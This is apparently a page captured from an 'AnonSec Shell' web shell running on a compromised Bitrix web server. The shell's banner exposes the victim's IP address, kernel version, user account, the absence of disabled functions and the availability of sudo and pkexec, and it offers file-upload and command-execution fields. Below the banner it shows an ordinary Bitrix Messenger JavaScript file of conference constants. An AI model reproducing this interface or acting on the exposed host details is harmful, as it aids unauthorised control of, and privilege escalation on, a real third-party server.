AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.22.61.174
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/js/im/old-chat-embedding/const/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/js/im/old-chat-embedding/const/src/conference.js
/**
 * Bitrix Messenger
 * Conference constants
 *
 * @package bitrix
 * @subpackage im
 * @copyright 2001-2020 Bitrix
 */

export const ConferenceFieldState = Object.freeze({
	view: 'view',
	edit: 'edit',
	create: 'create'
});

export const ConferenceStateType = Object.freeze({
	preparation: 'preparation',
	call: 'call'
});

export const ConferenceErrorCode = Object.freeze({
	userLimitReached: 'userLimitReached',
	detectIntranetUser: 'detectIntranetUser',
	bitrix24only: 'bitrix24only',
	kickedFromCall: 'kickedFromCall',
	unsupportedBrowser: 'unsupportedBrowser',
	missingMicrophone: 'missingMicrophone',
	unsafeConnection: 'unsafeConnection',
	wrongAlias: 'wrongAlias',
	notStarted: 'notStarted',
	finished: 'finished',
	userLeftCall: 'userLeftCall',
	noSignalFromCamera: 'noSignalFromCamera'
});

export const ConferenceRightPanelMode = Object.freeze({
	hidden: 'hidden',
	chat: 'chat',
	users: 'users',
	split: 'split'
});

//BX.Call.UserState sync
export const ConferenceUserState = Object.freeze({
	Idle: 'Idle',
	Busy: 'Busy',
	Calling: 'Calling',
	Unavailable: 'Unavailable',
	Declined: 'Declined',
	Ready: 'Ready',
	Connecting: 'Connecting',
	Connected: 'Connected',
	Failed: 'Failed'
});

Anon7 - 2022
AnonSec Team